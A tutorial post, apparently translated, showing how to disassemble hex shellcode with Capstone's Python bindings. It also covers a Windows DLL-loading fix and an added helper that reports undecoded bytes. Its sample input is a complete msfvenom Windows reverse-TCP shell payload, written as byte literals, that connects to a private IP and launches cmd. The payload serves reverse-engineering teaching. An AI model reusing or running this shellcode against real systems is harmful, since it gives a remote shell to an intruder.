1. Introduction
How many lines of code do you need to convert hex into disassembly?
Thanks to the Python bindings of the Capstone library, it only takes five lines of code.
In binary analysis, whether for exploit development or reverse engineering, you often need to turn a blob of hex shellcode into disassembly quickly. You can load it into a disassembler such as OllyDbg or IDA Pro, but if you don't want to bring a full-featured tool to bear on such a small task, the following Python code converts the shellcode into disassembly for you.
If you have not installed Capstone yet, install it as follows:
2. Installation
2.1. Debian-based
Use the following command to download and install it.
Note: Kali Linux already ships with it.
apt-get install python-capstone
2.2. Windows-based
On Windows, download the MSI file for your architecture and run the graphical installer:
32-bit:
https://github.com/aquynh/capstone/releases/download/3.0.5-rc2/capstone-3.0.5-rc2-python-win32.msi
64-bit:
https://github.com/aquynh/capstone/releases/download/3.0.5-rc2/capstone-3.0.5-rc2-python-win64.msi
3. Example
This example uses a reverse TCP connection shellcode generated by msfvenom.
#!/usr/bin/env python
from capstone import *

# The payload bytes are given as bytes literals so the script behaves the
# same on Python 2 and Python 3 (Capstone expects raw bytes, not text).
shellcode = b""
shellcode += b"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b"
shellcode += b"\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7"
shellcode += b"\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf"
shellcode += b"\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c"
shellcode += b"\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01"
shellcode += b"\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31"
shellcode += b"\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d"
shellcode += b"\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66"
shellcode += b"\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0"
shellcode += b"\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f"
shellcode += b"\x5f\x5a\x8b\x12\xeb\x8d\x5d\x68\x33\x32\x00\x00\x68"
shellcode += b"\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8"
shellcode += b"\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00"
shellcode += b"\xff\xd5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f"
shellcode += b"\xdf\xe0\xff\xd5\x97\x6a\x05\x68\xc0\xa8\x74\x80\x68"
shellcode += b"\x02\x00\x1f\x90\x89\xe6\x6a\x10\x56\x57\x68\x99\xa5"
shellcode += b"\x74\x61\xff\xd5\x85\xc0\x74\x0c\xff\x4e\x08\x75\xec"
shellcode += b"\x68\xf0\xb5\xa2\x56\xff\xd5\x68\x63\x6d\x64\x00\x89"
shellcode += b"\xe3\x57\x57\x57\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66"
shellcode += b"\xc7\x44\x24\x3c\x01\x01\x8d\x44\x24\x10\xc6\x00\x44"
shellcode += b"\x54\x50\x56\x56\x56\x46\x56\x4e\x56\x56\x53\x56\x68"
shellcode += b"\x79\xcc\x3f\x86\xff\xd5\x89\xe0\x4e\x56\x46\xff\x30"
shellcode += b"\x68\x08\x87\x1d\x60\xff\xd5\xbb\xaa\xc5\xe2\x5d\x68"
shellcode += b"\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0"
shellcode += b"\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5"

# x86, 32-bit mode: the msfvenom payload above is 32-bit Windows code
md = Cs(CS_ARCH_X86, CS_MODE_32)
# disassemble starting at address 0 and print one instruction per line
for i in md.disasm(shellcode, 0x00):
    print("0x%x:\t%s\t%s" % (i.address, i.mnemonic, i.op_str))
Code Explanation:
md = Cs(CS_ARCH_X86, CS_MODE_32): initializes the disassembler object with two parameters, the hardware architecture and the hardware mode.
for i in md.disasm(shellcode, 0x00): disasm disassembles the hex; its parameters are the shellcode and the start address.
print("0x%x:\t%s\t%s" % (i.address, i.mnemonic, i.op_str)): prints the address, the mnemonic and the operands.
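As an added example (not the original post's script), the following Python 3 helper generalizes the script above: it accepts the hex in the forms one usually copies from msfvenom output or a report, hands raw bytes to Capstone, and reports the offset at which decoding stopped when the blob ends mid-instruction or contains bytes Capstone cannot decode, which the simple loop above passes over silently. SAMPLE is a constructed input: the first line of the payload above, deliberately cut off inside an instruction.

```python
import re

# Constructed sample: the first line of the msfvenom payload from the post,
# which ends mid-instruction ("\x64\x8b" is a prefix+opcode without its ModRM).
SAMPLE = r"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b"


def parse_hex(text):
    """Turn pasted shellcode text into bytes. Accepts C-style "\\x" escapes,
    bare hex, "0x"-prefixed bytes, and whitespace/comma/quote separators."""
    cleaned = re.sub(r'\\x|0x|[\s,"\';]', '', text)
    if len(cleaned) % 2 or not re.fullmatch(r'[0-9a-fA-F]*', cleaned):
        raise ValueError("not a valid hex byte string")
    return bytes.fromhex(cleaned)


def disassemble(code, base=0, bits=32):
    """Disassemble x86 bytes with Capstone (imported lazily; returns
    (None, None) if the binding is not installed). Returns (instructions,
    stopped_at): instructions is a list of (address, hex bytes, mnemonic,
    op_str); stopped_at is None if every byte decoded, otherwise the offset
    where Capstone gave up, because disasm() stops silently on bad input."""
    try:
        from capstone import Cs, CS_ARCH_X86, CS_MODE_32, CS_MODE_64
    except ImportError:
        return None, None
    md = Cs(CS_ARCH_X86, CS_MODE_64 if bits == 64 else CS_MODE_32)
    insns, consumed = [], 0
    for i in md.disasm(code, base):
        insns.append((i.address, bytes(i.bytes).hex(), i.mnemonic, i.op_str))
        consumed += i.size
    stopped_at = None if consumed == len(code) else consumed
    return insns, stopped_at


if __name__ == "__main__":
    code = parse_hex(SAMPLE)
    insns, stopped_at = disassemble(code)
    if insns is None:
        raise SystemExit("capstone is not installed (pip install capstone)")
    for addr, raw, mnem, ops in insns:
        print("0x%04x:\t%-14s\t%s\t%s" % (addr, raw, mnem, ops))
    if stopped_at is not None:
        print("undecoded tail at offset 0x%x: %s"
              % (stopped_at, code[stopped_at:].hex()))
```

Run against SAMPLE it lists cld, call 0x87, pushal, mov ebp, esp and xor eax, eax, then reports the two undecoded bytes at offset 0xb; an unexpected early stop like this is the usual sign of a wrong mode (32 vs 64-bit), an encoded payload, or a copy error.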
4. Results
Save the above code and run it; the screenshot below shows the disassembly that the Python script produces from the hex (shellcode).
Figure: Converting hex to disassembly with a simple Python script
5. Practice
I encountered an error while installing Capstone.
The error message is as follows:
Traceback (most recent call last):
  File "sl.py", line 2, in <module>
    from capstone import *
  File "C:\Python27\lib\site-packages\capstone\__init__.py", line 249, in <module>
    raise ImportError("ERROR: fail to load the dynamic library.")
ImportError: ERROR: fail to load the dynamic library.
I debugged all the way down and finally found that the error occurs when ctypes loads the DLL; I don't know why.
C:\Python27\Lib\site-packages\capstone\__init__.py
So I manually changed the library path on line 210 of that file to the absolute path of the DLL.
_lib = "capstone.dll"  # before
_lib = "C:\\Python27\\lib\\site-packages\\capstone\\lib\\capstone.dll"  # after
The modified code is as follows:
if sys.platform == 'darwin':
    _lib = "libcapstone.dylib"
elif sys.platform in ('win32', 'cygwin'):
    _lib = "C:\\Python27\\lib\\site-packages\\capstone\\lib\\capstone.dll"
else:
    _lib = "libcapstone.so"
6. Results after the fix
7. Reference
https://haiderm.com/convert-hex-assembly-using-simple-python-script/
[Python] Using Python to convert shellcode into assembly